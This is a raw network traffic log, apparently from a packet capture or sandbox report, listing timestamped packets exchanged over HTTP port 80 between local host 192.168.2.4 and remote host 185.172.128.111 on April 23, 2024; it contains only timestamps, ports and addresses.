Apr 23, 2024 09:27:07.235748053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.235779047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.235785961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.235816002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.235826015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.235874891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.235886097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.235922098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.235939026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.235958099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.235974073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.235994101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236012936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236030102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236036062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236068010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236078978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236123085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236160040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236171961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236171961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236197948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236206055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236236095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236244917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236273050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236283064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236310005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236323118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236346006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236360073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236382961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236393929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236419916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236432076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236457109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236470938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236510038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236514091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236551046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236567974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236592054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236604929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236629009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236641884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236665010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236671925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236701012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.236716032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.236751080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.285486937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.285567999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.285607100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.285620928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.285620928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.285695076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286014080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286052942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286089897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286128044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286163092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286199093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286199093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286199093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286199093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286199093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286287069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286324024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286339998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286370039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286442995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286478996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286500931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286565065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286578894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286614895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286628008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286650896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286654949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286685944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286695957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286730051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286832094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286868095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286889076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286904097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.286910057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286950111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.286972046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287019968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287590027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287627935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287657022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287662983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287678957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287698984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287702084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287739038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287766933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287775040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287794113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287817001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287877083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287913084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287934065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287949085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287966967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.287986040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.287992954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288022995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288031101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288058996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288069010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288094997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288146019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288170099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288171053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288183928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288193941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288219929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288228989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288255930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288266897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288291931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288304090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288328886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288335085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288366079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288374901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288399935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288414001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288438082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288438082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288475037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288482904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288511038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288520098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288547039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288557053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288583040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.288598061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.288626909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.289531946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.289568901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.289582968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.289617062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333442926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333502054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333518982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333539009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333575010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333595991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333595991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333611012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333626032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333647013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333674908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333682060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333702087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333719969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333731890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333756924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333760023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333792925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.333805084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.333844900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.336641073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.336678028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.336812973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.336812973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388503075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388562918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388600111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388636112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388673067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388709068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388732910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388732910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388732910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388732910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388734102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388746023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388782978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388813019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388813019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388822079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388839960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388858080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388874054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388894081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388928890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388940096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388940096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.388964891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.388973951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389000893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389008999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389038086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389046907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389074087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389081955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389111996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389134884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389147997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389153004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389185905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389194965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389221907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389244080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389259100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389261961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389296055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389313936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389332056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389345884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389370918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389385939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389408112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389421940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389461040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389519930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389558077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.389713049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.389713049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.400795937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.401005983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439212084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439294100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439403057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439444065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439461946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439481974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439492941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439521074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439538956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439559937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439578056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439600945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439620018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439637899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439665079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439673901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439687967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439712048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439722061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439748049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439766884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439786911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439801931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439825058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439842939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439861059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439866066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439898014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439905882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439934015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439944029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.439974070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.439980984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.440018892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.440538883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.440577030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.440603971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.440613985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.440630913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.440651894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.440653086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.440696001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.440705061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.440751076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.441339970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.441378117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.441395998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.441428900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442229033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442246914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442262888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442280054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442291021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442291021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442323923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442338943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442357063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442385912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442435980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442548990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442564964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442580938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442584991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442598104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442615986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442615986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442626953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442634106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442646027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442651033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442658901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442667961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442670107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442696095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442704916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442709923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442725897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442740917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442744017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442755938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442758083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442775011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442779064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442790985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442795992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442811012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442825079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442825079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442842960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442862034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442888021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442914963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442931890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442946911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442965031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442974091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442984104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.442991972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.442994118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.443008900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.443016052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.443026066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.443044901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.491492033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.491532087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.491569042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.491607904 CEST	80	49730	185.172.128.111	192.168.2.4
